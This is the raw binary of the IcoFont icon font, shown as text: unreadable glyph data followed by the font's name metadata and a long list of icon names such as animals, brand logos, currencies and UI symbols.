����+/3!3#3##535#535#535#53#5##5##5##!5#535#53?k����� ��������3>^?^>^>������ � ���� �!� ��"��``_!� ����!"3!2654&a�&**�+++�&++�+��6&06@L%5#54."#673673#!5#76?5#54>2#6?3063?3%#436?369Gz�zG9;gSQ<�@�;(J;<��,LZL,��;JK=;��<�@H�@<
�<��wHzHHzHx��h<QS�ACQ
(<J<�x-L,,L-x�ZKJ=� ��A��A����b23#&'&'"?0&5&'&'5'&'&/#32376767276767461'&'&37676767�l=]Md)%"
		!'#O`Cmv;cOq,&!	+2Q)+/'N-k
�*#L_=neD\L%0*%	
�%O`FkoCbP
$Q6

���_!"&?64/&"&54&+"/&"#!"3!22?6;265462?64/&63!26=4&����	��	���c�	��	�cw�	�c���	��	���c�	����:'&/&#?676&/&'&'&6?67>76?>2�"Y-3	"�fh5"C!'�T+�
�"W+��	m67
E�J!A",#�V��	*��:z��%&'&'&3"'&'&>72626.737>767>654747#;2767>'&'&'#4?656'.+6=462>=+"'&'&476?2>&"�* 2;$"!H�H"F;1!* !F'!"&G!�K
	#*/-,#
 -$�#,\	

!11!
?$$4&%�


D	D9		
 J 

K:_0�����	QO$,-"D �s��
#F$4%%3%���	%1=Ip."312?32>4&+"=4;25+"=4;25+"=4;2"'&47627"'5>7654&+&'&'76?32'=���|C=:�	KW�|DD���������##>
 
;:�255e�IF2�
{5e�����#-$-#�#�	,S

5-��0>&'&#"&'&'&67676'.2?66/&'&6?>-Gv20��4/1!�)h4R*�df[TM`UV	796;O7�F	�gJ���"/&'&7676?6#4&">�Ԗ
 %�/ ���"�+<*+=+>,�F�*2"�k9���**<++����0K&'&/&'&7276?676&%#"&'&567>2&/&'&6?6&/$I�IH	� *�Pk5��&&
�I��!)	
	!`�+�;$I�IH
,$��kPk52�$
	!�I�� 	 ��2��2���GQ]iu326=4&+"!326=4&+"7#+"&=#+"&=#"3!2>54.#!"&5!!264&#!"!264&#!"!264&#!"��#-,�,-11z10�������)��}DDDDK""00""""00""0��00M1�S�$$�$$�$$	��#+FXh���#54&+54&+"#"#"3!2654&%32#54#!"&546;3!26=32'21767676'2&#";26=4&''&302567672'0'&#";2=4&'"3:567676/&#";26=4&�`B
X
B
`��BG�T
	S��2,#@	���#@	���#@	���--�H�P""���&

&�oy2A!&
4�A!&4�A '3
��".BO[h|������&54&"+"&4&"#3!26=%762"&4'4630132+01"&546;2+"&"&4?62'"/&462+01"&=4630132'#"&46;2"/&4627#"&46;263&'&'&'&'&3476726=#3#%#;#265Y�
!1x
���$	$	:�3		3c$	##	$:Y$$3	3		�YW&�)4M[{�bQ7-�4r
�
S�
�
"<�>1H �

�&%	&	
H		6		V		
		B%	&	
v&	%
�		6		3J%
	&Y	
		
	H�
25
K2

����w&'.'.#.?767>/37676;6?676763326'&6?>'&/6/7767>�D#
�^
.[;
	
�


	
\-
	
E.63
c�3


�R
��Q
@'
"
	' ;
	"

&
�v�y=3�T

D#��'7764/375'#3!2654&#!"!"&5463!2���{{�����- � .. �0 -��r -.� --IS)T!57
�

�� .. � ..��- � -- �D -����P"#"&54673!.'&'.'&'&/&'.5476;6?6;�00b!o��
1
1)�&6""0
� �[_9"6 3=	W
7'-
 .
4 1����V"#";254&%!767654'&'&'&3;27>7>=67>=4'>=4.�00b!o��	

1
')�&6"0��[ !�.*#"
5 3=

��
8&.)
4 1����9&'&#'&3767676767>#!"&5463!767!"3!265�	��\M�_8;BQ_co#��##��##�#�
\�TZ�S��Famhy[�f$$V#
#�N##'����##"'&67667672�rl^KD��6�Vk���h�w}pPk3�ec�h	��4<GPZd'.#'&7676/.'367%'67677>>76767#6767>7#'6?63�(;(�
��(;(	
���

	





'

|,
}8�}.'	}�943333G33���
4&/#%%'76?654;2?6?676&+"Z�:��(��	J&&h
��$�		
�
�'9��*hk	nUBpv:�8<
�3,FN\l!"3!2>4.!".4>3!2%".4>27&'&"32>764'&"4327275364'#5353275364'#5364'�2U11U2�2U11UH�2-M--M-�-M--M��$>H>$$>H>$�
	**('3:ata:9btb9�{/Q`Q//Q`Q/�$>$$>H>$$>	


'	Y^/s�9 �9 �3,CK]!"3!2>4.!".4>3!2"2>4.&'&"2>4&"4327'&"275275&"�2U11U2�2U11UH�2-M--M-�-M--MS$>$$>H>$$>�Y	
*f*
*
3:atb99bta:�{/Q`Q//Q`Q/6$>H>$$>H>$N

	
W^/sVV�WW����Q|�6767676'/&'&'&/&676?&#'&#"76767>/&6?6.'&/&'.7674'&'&767>4'&/&'&74'&/&'&�F- 
I(
6Z1
c�&I	'
	
$6/.3	(�_
#FF	7K#
	T^084
z�r

`

"C)
	�	- ,/'P	
'	 "O4a�
# QP& P3+	(�-	"FE
7H&	T^.	
=w�	_
!C)	
	������&=46?'.#&/&?67'&/&'&/#/&'&'&767267676376767676?&/&?>2?67&'&.7>&/'&'.=76547676&"&>R	5.	
/7
>
6 
 #<(	.
0$

>

60
	C	(��'9=+(8=�	5+,	. #|> 2
	 0	')	.
	
6"
.!')/!
>:')7;P7�	[
Y',T	��(?#T����/ARdr���&'"&'&/&/&7636&67676676257>'.?67'&'.>47676&%/.>2'&'&647676&�e	
#

** 
#$$
#
	!�
"
��
+,,$�@0��


�&!

%#!X&2%%%�$��	


	
HH"	k)#

E�
�

+U,!, �		��8FTao%45476?#54?#5!###33536=476?#".54632'.7>'".4>2'"32676.�:gcf��f>f>f,e�c/,g�1>,11M2.; 48.k&@$%?J@%$@%11+<2�<;
%L��HIP(�P)-D8%\S>8�0,>091v/A-/ 2t%?J@%%@J?%�281=+2���4=CIO&'5#&'5&"3#3#353635335#535#535#0#'&473'53'53#&473�	������������������������	������e����
�
�
�������������������
�����lN&'.56&'&'&/+'&7627#"3!26=4&+276>?5'&d;B3
 ,	+*X@K
@Q%.-Y

8

Y)!*[A�<3P	 
'>- P 
&2	
��
0

0
6A/ 	�h�fFi�������"#&&76'.'&'&7676"#&#6376/&'&.7276"7676767676.276'&/&'&4&/&767.>76%7>&/&'&&6."2674&#"7367676&#�J%
d42		E��_�>	
&
 $3
(Q�
`	
	
p5C	
.
"FZ@
	2�


_		��	z
	�
�L`
@gcmq]�TJ

6
}/3$/�J	�D4 	
.'J.��0	
&�
C	

	r	.		
	!�
��3#!"&546;2?547>#56&'.3!2	��		+		Sx>D[R
Q5 :%�	��*		�	s+?_'lE;('2?$9><D	���9#!"&546;26=<'.'&+"&=47>763!2�	��		*	%:!4R
4	[D>x)*	�	��*�	d 9$?2�	&M%Em&/0@,s	����+62"/+"&5"/&47!5#3!265�&;�b�;t��y#�#���9���

v�9����$$����+4=2?;2652?64'&"+"&=!!5"&4623"&462k�
c
�:�����
�
�2k�� ud���

m�9���44�ɉ���/@P"#"3'+"&=46;274#+3'+"&=46;2"#"3!2654&#!"&=3!265�89~$�:$J��W

��

-
�fX�f~��B��



���M5#33'3&/&56'47676.2654&/654?67>=�h"&%*=*`	%#%"F!+7N7+!4ii
##Fj+*�7["$
 	$%
,,$!B4"'77'"4={3-�����&'&'"?67>."&/.&'.7>546?6?>/.&'&>76?6/&636?>/.&@*OM[m

�
y�

l:!!5y4&<3x
>xb(5y5�Q10/
9"3	8-C�Ut2t<}n'"3"M7t2t
��"/.76>'&'.����9&�p%H�~��3!���V*T���)R[dmv������276764'&'&""'&'&476762326?!26=4&#!'.#"&/&/&"2>&"264.'>4&.264&"26264&"264&"%.">6&"264&"664&"?;:df�ec:<<:cg�fc:<853XZ�ZX3563X[�ZW34�P$��e
�

�


�

�


s
y



��



)



r


`wgd:<=:cg�fc:<<:cfxiZX3453X[�[W3554XZXc
���	


:	



	

�	

�c	
�
��	
�



�

�	

��	

��#'+/37;?C%!5!7!!%!!%!!%!)5!%!5!%!!%!!%!!!!!5!!5!'#335#35%35���z������������������������������[��-��xxyyyz��xj�hii�hjjih�hhiihh�oggg�hi
ggii��+454>3!54&#!"3!265!".%!"3!26=4&"&462�6 �7  � ��6���%55%��(�6"  �� !6�5&%5r�((��� ."276764'&'&"&=462'"&'&6;2�wec:<<:ce�fc:<<:cf5&8%%8&!L<:cf�fc:<<:cf�fc:<�{&&%%�!����(!2>'.%"&=46232"&'&6��%
��
11
��%�"4""4"\E.0��t0�""""���
��%_&"3267676'&'&&/&/&'&'&/&'&/&'&/&'&/5&=6427376"���
,(�K8s,/
��




�

�)TKET/*,7<@
��	


&����*39CIVcksy~�������.'&"#327>735'&'37373#'#/56?6#'"'>6767>2#'#'3737&/6#63&67&.'>5&'&'37#'37373#576?7&'673&'7{sOQ�ROs..sOR�QNt/�" 6'  "!~(sM�33?Fu;=�!!.

+P#rrG(M /3�AS*
�!  !r!#V
1*O0r]G(�S�$&%$�S�S�$&&$�S��6�SSSS�KK9
)�#11
&�+K�+9�KL�SSSS&
'M
%(:��(%1WQ-G,5&�L�SSSS��ߋ+%(0&L
%(:0(%1:���:%#".546?'326?'%&+''#'>54&"%?6'&+:M>h=,)F<A.-LN[@x/kS
;_���5L6

$d�C-=h=4\ U0�M[NL-.0,3<h[
$&66&	���
��#09=QU^h#&'&"#";276732>=4.#'#'3737372"&463#%#!276=4>;23#7"&462'3#3##:*9<�<9*:*G))G*:*9<�<9*:*G**G�11/8170
22�!7!��" 8!�!7!z226��pee6(//*G*^*G*//*G*^*G*�̀��zzzzE�9!7!# 6^!8 !7!��
1.0?��5N]."327>22?64'%"27>22?64'."27>22?64'."2?64'&�W��W;G�ʹH@�LY�@@	0|�|0	@@�Y7f(@>D>?(f7'>>�W]]W;HMMH@D??0330??D�*'??'*�>>	���n���1B2767654'.'&'&#";&#"'"//4&"#/&='&'&'"'&'&/762?6?&/&?6'&#"/&/".'5&54&76/#&/76'6?6?636367265?6/&76767676'5&/&76?65'&&#&#&##'&'.'&/&5&767654&676''&'"&6?6'6?"#&/&'&5&4565'.'&?67672&/##"'"51&>7263?6?637&'&'#'/&5&'&?43?6233##&'&'&5'4'&5&?4&/47657'.?'&/&/&'&74'&56?676764&'&5'4'&'743?25"'&+"&6'&'"'>322�wfc:<#"|P?>vfc:<<:cf=7U


	



		
/-O
	>	b/# ��
5Z\m


	



r		

	X<:cfwZROz <:cf�fc:<
 b<



	&�<BcXU7

			
� 		&

�
	
[57	)


		
	*
!

!
		
	

����&'&/&/.>7>767>'4/&'&'&/&'&'&'.46?64'&3!27667676'&'&'&'.676363272767676'&L@S2d1d!"8�7]I&6#F;"/�2!V"!#!BT*El:(3es9_KO&S�!$
*Bp7 ) 

*9"G>F�q8+h	
	3	'$
	


':.$'	+&
	
	/)%���Q�##3#3#3#3#3##"&54675#535#535#535#535#535#535#"3!2>54.;527732?6?67654/4'&/&'./#�,,,,,,,,,,,%32.?2%,,,,,,,,,,,,�5Z44Z5�5Z55Z��++,++,+,+,*W
=&2?-*<+,*,+,++,++,+4Y5�5Y44Y5�5Y4��	
�'
+.Y	l	z	�	�	�	�	
V�	&IcoFontRegularicofonticofontVersion 1.0icofontGenerated by svg2ttf from Fontello project.http://fontello.comIcoFontRegularicofonticofontVersion 1.0icofontGenerated by svg2ttf from Fontello project.http://fontello.com
.	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������												
			
																			 	!	"	#	$	%	&	'	(	)	*	+	,	-	.	/
angry-monsterbathtub
bird-wingsbowcastlecircuit
crown-kingcrown-queendartdisability-race
diving-goggleeye-openflora-flowerfloragift-boxhalloween-pumpkin
hand-powerhand-thunderking-monsterlovemagician-hatnative-americanowl-lookphoenix
robot-face
sand-clock
shield-alt
ship-wheelskull-danger
skull-face
snowmobile
space-shuttle
star-shapeswirltattoo-wingthronetree-alttriangle
unity-handweed
woman-birdbat	bear-facebear-tracksbearbird-altbird-flyingbirdbirdsbonebull
butterfly-alt	butterfly	camel-alt
camel-headcamel	cat-alt-1	cat-alt-2	cat-alt-3cat-dogcat-facecatcow-headcowcrab	crocodile	deer-headdog-altdog-barkingdogdolphinduck-tracks
eagle-head
eaten-fishelephant-altelephant-head-alt
elephant-headelephantelkfish-1fish-2fish-3fish-4fish-5fishfox-altfoxfrog-tracksfrogfroggygiraffe-head-1giraffe-head-2giraffe-headgiraffe	goat-headgorilla
hen-trackshorse-head-1horse-head-2
horse-headhorse-tracks	jellyfishkangaroolemurlion-head-1lion-head-2	lion-headlionmonkey-2monkey-3monkey-facemonkeyoctopus-altoctopusowl
panda-facepandapanther
parrot-lipparrotpawpelicanpenguinpig-facepigpigeon-1pigeon-2pigeonrabbitrat
rhino-headrhinoroosterseahorseseal
shrimp-altshrimpsnail-1snail-2snail-3snailsnakesquidsquirrel
tiger-facetigerturtlewhale
woodpeckerzebra
brand-acerbrand-adidasbrand-adobebrand-air-new-zealandbrand-airbnb
brand-aircellbrand-airtel
brand-alcatel
brand-alibababrand-aliexpressbrand-alipaybrand-amazon	brand-amdbrand-american-airlinesbrand-android-robot
brand-android	brand-aolbrand-applebrand-appstore
brand-asus	brand-ati	brand-att
brand-audibrand-axiata
brand-bada	brand-bbc
brand-bingbrand-blackberry	brand-bmw	brand-boxbrand-burger-kingbrand-business-insiderbrand-buzzfeedbrand-cannonbrand-casiobrand-china-mobilebrand-china-telecombrand-china-unicombrand-ciscobrand-citibank
brand-cnet	brand-cnnbrand-cocal-colabrand-compaqbrand-debianbrand-delicious
brand-dellbrand-designbumpbrand-designfloatbrand-disneybrand-dodge
brand-dovebrand-drupal
brand-ebaybrand-elevenbrand-emirates
brand-espnbrand-etihad-airwaysbrand-etisalat
brand-etsybrand-fastrackbrand-fedex
brand-ferraribrand-fitbitbrand-flikrbrand-forbesbrand-foursquare
brand-foxconn
brand-fujitsubrand-general-electricbrand-gillette
brand-gizmodobrand-gnomebrand-googlebrand-goprobrand-guccibrand-hallmark	brand-hi5brand-hondabrand-hp
brand-hsbc	brand-htcbrand-huawei
brand-hulu
brand-hyundai	brand-ibm
brand-icofont	brand-icq
brand-ikea
brand-imdbbrand-indiegogobrand-intelbrand-ipairbrand-jaguar
brand-javabrand-joomlabrand-kickstarter	brand-kikbrand-lastfm
brand-legobrand-lenovobrand-levisbrand-lexusbrand-lgbrand-life-hackerbrand-linux-mintbrand-linuxbrand-lionixbrand-lorealbrand-louis-vuittonbrand-mac-osbrand-marvel-appbrand-mashablebrand-mazdabrand-mcdonalsbrand-mercedesbrand-micromaxbrand-microsoftbrand-mobilemebrand-mobilybrand-motorola	brand-msi	brand-mts
brand-myspace
brand-mytv
brand-nasabrand-natgeo	brand-nbc
brand-nescafebrand-nestle
brand-netflixbrand-nexus
brand-nikebrand-nokiabrand-nvidiabrand-omegabrand-opensusebrand-oraclebrand-panasonicbrand-paypalbrand-pepsi
brand-philipsbrand-pizza-hutbrand-playstation
brand-pumabrand-qatar-air	brand-qvcbrand-readernaut
brand-redbullbrand-reebok
brand-reuters
brand-samsung	brand-sapbrand-saudia-airlinesbrand-scribdbrand-shell
brand-siemensbrand-sk-telecombrand-slidesharebrand-smashing-magazinebrand-snapchatbrand-sony-ericsson
brand-sonybrand-soundcloudbrand-sprint
brand-squidoobrand-starbucks	brand-stcbrand-steambrand-suzuki
brand-symbianbrand-t-mobilebrand-tangobrand-targetbrand-tata-indicombrand-techcrunch
brand-telenorbrand-teliasonerabrand-teslabrand-the-vergebrand-thenextweb
brand-toshibabrand-toyotabrand-tribenetbrand-ubuntubrand-unilever
brand-vaio
brand-verizonbrand-viberbrand-vodafonebrand-volkswagen
brand-walmartbrand-warnerbrosbrand-whatsappbrand-wikipedia
brand-windows
brand-wirebrand-wordpressbrand-xiaomibrand-yahoobuzzbrand-yamaha
brand-youtube
brand-zainbank-altbankbarcodebill-alt	billboardbriefcase-1briefcase-2businessman
businesswomanchaircoinscompanycontact-addfiles-stackhandshake-dealid-cardmeeting-add	money-bag	pie-chartpresentation-altpresentationstampstock-mobilechart-arrows-axischart-bar-graphchart-flow-1chart-flow-2
chart-flowchart-growthchart-histogram-altchart-histogramchart-line-alt
chart-line
chart-pie-alt	chart-piechart-radar-grapharchitecture-altarchitecture	barricadeboltbricksbuilding-alt
bull-dozercalculations
cement-mixcement-mixerconcrete-mixerdanger-zonedrill
eco-energyeco-environmen
energy-air
energy-oilenergy-savingsenergy-solarenergy-waterengineerfire-extinguisher-altfire-extinguisher	fix-tools	fork-liftglue-oil
hammer-althammer
help-robotindustries-1industries-2industries-3industries-4industries-5
industrieslabourminingpaint-brush	pollution
power-zoneradio-activerecycle-alt
recycling-mansafety-hat-light
safety-hatsawscrew-drivertools-1	tools-bag	tow-trucktrolleytrowelunder-construction-altunder-constructionvehicle-cement
vehicle-cranevehicle-delivery-van
vehicle-dozervehicle-excavatorvehicle-trucktorvehicle-wreckingworker
workers-groupwrench
afghani-false
afghani-minusafghani-plusafghani-trueafghani
baht-false
baht-minus	baht-plus	baht-truebaht
bitcoin-false
bitcoin-minusbitcoin-plusbitcoin-truebitcoindollar-flasedollar-minusdollar-plusdollar-truedollar
dong-false
dong-minus	dong-plus	dong-truedong
euro-false
euro-minus	euro-plus	euro-trueeurofrank-falsefrank-minus
frank-plus
frank-truefrank
hryvnia-false
hryvnia-minushryvnia-plushryvnia-truehryvnia
lira-false
lira-minus	lira-plus	lira-truelirapeseta-falsepeseta-minuspeseta-pluspeseta-truepeseta
peso-false
peso-minus	peso-plus	peso-truepesopound-falsepound-minus
pound-plus
pound-truepoundrenminbi-falserenminbi-minus
renminbi-plus
renminbi-truerenminbiriyal-falseriyal-minus
riyal-plus
riyal-trueriyalrouble-falserouble-minusrouble-plusrouble-trueroublerupee-falserupee-minus
rupee-plus
rupee-truerupee
taka-false
taka-minus	taka-plus	taka-truetakaturkish-lira-falseturkish-lira-minusturkish-lira-plusturkish-lira-trueturkish-lira	won-false	won-minuswon-pluswon-truewon	yen-false	yen-minusyen-plusyen-trueyen
android-nexusandroid-tabletapple-watchdrawing-tabletearphoneflash-drivegame-consolegame-controllergame-padgameheadphone-alt-1headphone-alt-2headphone-alt-3
headphone-alt	headphonehtc-oneimacipadiphone	ipod-nano
ipod-touchkeyboard-altkeyboard-wirelesskeyboard
laptop-altlaptopmacbookmagic-mouse
micro-chipmicrophone-alt
microphonemonitormouse
mp3-playernintendoplaystation-altpsvita	radio-micradiorefrigeratorsamsung-galaxysurface-tablet
ui-head-phoneui-keyboardwashing-machinewifi-routerwii-u
windows-lumiawireless-mousexbox-360
arrow-down
arrow-leftarrow-rightarrow-up
block-down
block-leftblock-rightblock-upbubble-downbubble-leftbubble-right	bubble-up
caret-down
caret-leftcaret-rightcaret-upcircled-downcircled-left
circled-right
circled-upcollapsecursor-dragcurved-double-leftcurved-double-rightcurved-downcurved-leftcurved-right	curved-updotted-downdotted-leftdotted-right	dotted-updouble-leftdouble-right
expand-alt	hand-down	hand-drag
hand-drag1
hand-drag2hand-drawn-alt-downhand-drawn-alt-lefthand-drawn-alt-righthand-drawn-alt-uphand-drawn-downhand-drawn-lefthand-drawn-right
hand-drawn-up
hand-grippers	hand-left
hand-righthand-upline-block-downline-block-leftline-block-right
line-block-uplong-arrow-downlong-arrow-leftlong-arrow-right
long-arrow-uprounded-collapserounded-double-leftrounded-double-rightrounded-downrounded-expandrounded-left-downrounded-left-uprounded-leftrounded-right-downrounded-right-up
rounded-right
rounded-upscroll-bubble-downscroll-bubble-leftscroll-bubble-rightscroll-bubble-upscroll-double-downscroll-double-leftscroll-double-rightscroll-double-upscroll-downscroll-leftscroll-long-downscroll-long-leftscroll-long-rightscroll-long-upscroll-right	scroll-upsimple-downsimple-left-downsimple-left-upsimple-leftsimple-right-downsimple-right-upsimple-right	simple-upsquare-downsquare-leftsquare-right	square-upstylish-downstylish-left
stylish-right
stylish-upswoosh-downswoosh-leftswoosh-right	swoosh-upthin-double-leftthin-double-right	thin-down	thin-left
thin-rightthin-upabcatomawardbell-altblack-boardbook-altbook
brainstormingcertificate-alt-1certificate-alt-2certificate	educationelectronfountain-pen	globe-altgraduate-altgraduategroup-studentshat-althat
instrument
lamp-lightmedalmicroscope-alt
microscopepaper	pen-alt-4pen-nibpencil-alt-5	quill-pen
read-book-alt	read-book
school-bag
school-busstudent-altstudentteacher	test-bulb
test-tube-alt
universityangry
astonished
confoundedconfusedcryingdizzyexpressionless
heart-eyeslaughing
nerd-smile
open-mouthragerolling-eyessadsimple-smileslightly-smilesmirkstuck-out-tongue
wink-smileworriedfile-alt
file-audiofile-avi-mp4file-bmp	file-codefile-css
file-documentfile-eps
file-excelfile-exe	file-filefile-flvfile-gif
file-html5
file-imagefile-iso	file-javafile-javascriptfile-jpg	file-midifile-movfile-mp3file-pdffile-phpfile-pngfile-powerpointfile-presentationfile-psbfile-psdfile-python	file-rubyfile-spreadsheetfile-sqlfile-svg	file-text	file-tiff
file-video	file-wavefile-wmv	file-wordfile-zipcycling-altcyclingdumbbell	dumbbells	gym-alt-1	gym-alt-2	gym-alt-3gym
muscle-weightmuscleapplearabian-coffee	artichoke	asparagusavocado	baby-foodbananabbqbeansbeerbell-pepper-capsicum
birthday-cakebreadbroccoliburgercabbagecarrotcauli-flowercheesechefcherrychicken-frychickencocktail
coconut-watercoconut
coffee-alt
coffee-cup
coffee-mug
coffee-potcolacorn	croissant
crop-plantcucumberculinarycup-cakedining-tabledonut	egg-plantegg-poached
farmer-altfarmer	fast-foodfood-basket	food-cartfork-and-knifefrench-friesfruitsgrapeshoneyhot-dog
ice-cream-alt	ice-creamjuiceketchupkiwilayered-cake	lemon-altlemonlobstermangomilkmushroomnoodlesonionorangepearpeaspepperpie-altpie	pineapplepizza-slicepizzaplantpopcornpotatopumpkinraddishrestaurant-menu
restaurantsalt-and-peppersandwichsausagesoft-drinks	soup-bowlspoon-and-forksteak
strawberrysub-sandwichsushitacotea-potteatomato
watermelonwheat
baby-backpack
baby-clothbaby-milk-bottlebaby-trolleybabycandy
holding-hands
infant-nipplekids-scooter
safety-pin
teddy-beartoy-balltoy-cattoy-ducktoy-elephanttoy-hand	toy-horse	toy-lattu	toy-trainburglar
cannon-firing	cc-camera	cop-badgecopcourt-hammercourtfinger-printgavelhandcuff-althandcuff
investigationinvestigatorjailjudge	law-alt-1	law-alt-2	law-alt-3law-booklaw-document	law-orderlaw-protect
law-scaleslawyer-alt-1lawyer-alt-2lawyerlegalpistolpolice-badge
police-cappolice-car-alt-1police-car-alt-2
police-car
police-hat
police-vanpolice	thief-altthief
abacus-altabacus	angle-180angle-45angle-90anglecalculator-alt-1calculator-alt-2
calculatorcircle-ruler-altcircle-ruler
compass-alt-1
compass-alt-2
compass-alt-3
compass-alt-4golden-ratiomarker-alt-1marker-alt-2marker-alt-3markermathmathematical-alt-1mathematical-alt-2mathematical	pen-alt-1	pen-alt-2	pen-alt-3pen-holder-alt-1
pen-holderpenpencil-alt-1pencil-alt-2pencil-alt-3pencil-alt-4pencilruler-alt-1ruler-alt-2ruler-compass-alt
ruler-compassruler-pencil-alt-1ruler-pencil-alt-2ruler-pencilruler
rulers-altrulerssquare-root
ui-calculatoraidsambulance-crescentambulance-cross	ambulanceautismbandageblind
blood-drop
blood-testblood	brain-altbraincapsulecrutchdisabled	dna-alt-1	dna-alt-2dna
doctor-altdoctor	drug-packdrug
first-aid-alt	first-aidheart-beat-alt
heart-beat	heartbeatherbalhospitalicuinjection-syringe
laboratorymedical-sign-altmedical-sign	nurse-altnursenursing-homeoperation-theaterparalysis-disabilitypatient-bedpatient-filepillsprescriptionpulsestethoscope-altstethoscope	stretchersurgeon-altsurgeontabletstest-bottle	test-tubethermometer-altthermometertoothxrayui-addui-alarm
ui-batteryui-blockui-bluetooth
ui-brightness
ui-browserui-calendarui-call	ui-cameraui-cart
ui-cell-phoneui-chatui-check
ui-clip-boardui-clipui-clockui-closeui-contact-listui-copyui-cut	ui-delete
ui-dial-phoneui-editui-emailui-fileui-fire-wallui-flash-light	ui-flight	ui-folderui-gameui-handicappedui-homeui-image
ui-laodingui-lockui-love-addui-love-brokenui-love-removeui-loveui-map
ui-messageui-messagingui-movieui-music-playerui-musicui-mute
ui-networkui-nextui-note	ui-officeui-passwordui-pauseui-play-stopui-play
ui-pointerui-powerui-pressui-previousui-rate-add
ui-rate-blankui-rate-remove	ui-rating	ui-record	ui-removeui-replyui-rotationui-rss	ui-searchui-settingsui-social-linkui-tagui-text-chatui-text-loadingui-themeui-timerui-touch-phone	ui-travel	ui-unlock
ui-user-groupui-user	ui-v-card
ui-video-chatui-video-message
ui-video-playui-video	ui-volume
ui-weatherui-wifi
ui-zoom-inui-zoom-outcassette-playercassetteforwardguitermovie
multimedia	music-alt
music-disk
music-notemusic-notesmusicmute-volumepause
play-alt-1
play-alt-2
play-alt-3
play-pauseplayrecordretro-music-diskrewind
song-notessound-wave-alt
sound-wavestop	video-alt	video-cam
video-clappervideo
volume-barvolume-downvolume-mute
volume-off	volume-upyoutube-play
2checkout-alt	2checkout
amazon-altamazonamerican-express-altamerican-express
apple-pay-alt	apple-paybank-transfer-alt
bank-transfer
braintree-alt	braintreecash-on-delivery-altcash-on-deliverydiners-club-alt-1diners-club-alt-2diners-club-alt-3diners-clubdiscover-altdiscovereway-altewaygoogle-wallet-alt-1google-wallet-alt-2google-wallet-alt-3
google-walletjcb-altjcbmaestro-altmaestromastercard-alt
mastercardpayoneer-altpayoneer
paypal-altpaypalsage-altsage
skrill-altskrill
stripe-altstripevisa-alt
visa-electronvisawestern-union-alt
western-unionboybusiness-man-alt-1business-man-alt-2business-man-alt-3business-manfemale	funky-mangirl-altgirlgroup
hotel-boy-alt	hotel-boykidman-in-glassespeoplesupport
user-alt-1
user-alt-2
user-alt-3
user-alt-4
user-alt-5
user-alt-6
user-alt-7user-female	user-maleuser-suiteduserusers-alt-1users-alt-2users-alt-3users-alt-4users-alt-5users-alt-6users-socialusers
waiter-altwaiterwoman-in-glassessearch-1search-2search-document
search-folder
search-job
search-mapsearch-propertysearch-restaurantsearch-stocksearch-usersearch500pxaimbadoobaidu-tieba
bbm-messengerbebobehanceblogger	bootstrap
brightkitecloudapp	concrete5	delicious
designbumpdesignfloat
deviantartdiggdotcmsdribbbledribbledropboxebuddyelloemberenvatoevernotefacebook-messengerfacebook
feedburnerflikrfolkd
foursquare
friendfeedghostgithubgnomegoogle-buzzgoogle-hangouts
google-mapgoogle-plusgoogle-talkhype-machine	instagram	kakaotalkkickstarterkikkiwiboxline-messengerlinelinkedin
linux-mintlive-messengerlivejournalmagentomeetmemeetupmixxnewsvinenimbuss
odnoklassnikiopencart
oscommercepandoraphotobucketpicasa	pinterest
prestashopqikqq
readernautredditrenrenrssshopifysilverstripeskypeslackslashdot	slidsharesmugmugsnapchat
soundcloudspotifystack-exchangestack-overflowsteamstumbleupontagged
technoratitelegramtindertrellotumblrtwitchtwittertypo3ubercartviberviddlervimeovinevirb
virtuemartvkwechatweibowhatsappxingyahooyelpyoukuyoutubezencartbadminton-birdiebaseball
baseballerbasketball-hoop
basketball
billiard-ball
boot-alt-1
boot-alt-2bootbowling-altbowlingcanoecheer-leaderclimbingcorner	field-altfieldfootball-altfootball-americanfootballfoulgoal-keepergoalgolf-altgolf-bag	golf-cart
golf-fieldgolfgolferhelmet
hockey-althockey	ice-skate
jersey-altjerseyjumpingkicklegmatch-reviewmedal-sportoffsideolympic-logoolympicpaddingpenalty-cardracer
racing-carracing-flag-altracing-flag
racings-wheelreferee
refree-jerseyresult-sport
rugby-ballrugby-playerrugbyrunner-alt-1runner-alt-2runnerscore-board
skiing-manskydiving-gogglessnow-mobilesteering	stopwatch
substituteswimmertable-tennisteam-altteam
tennis-playertennistracking
trophy-alttrophyvolleyball-altvolleyball-fire
volleyballwater-bottlewhistle-altwhistle
win-trophyalign-center
align-leftalign-rightall-capsboldbrush
clip-boardcode-altcolor-bucketcolor-pickercopy-invertcopycut
delete-altedit-alt
eraser-altfontheadingindent
italic-altitalicjustify-alljustify-centerjustify-left
justify-rightlink-brokenoutdent
paper-clip	paragraphpinprinterredorotationsave	small-capstrike-throughsub-listing	subscriptsuperscripttabletext-height
text-widthtrash	underlineundoair-balloonairplane-altairplanearticulated-truckauto-mobile
auto-rickshaw
bicycle-alt-1
bicycle-alt-2bicycle	bus-alt-1	bus-alt-2	bus-alt-3buscab	cable-car	car-alt-1	car-alt-2	car-alt-3	car-alt-4car
delivery-time
fast-deliveryfire-truck-alt
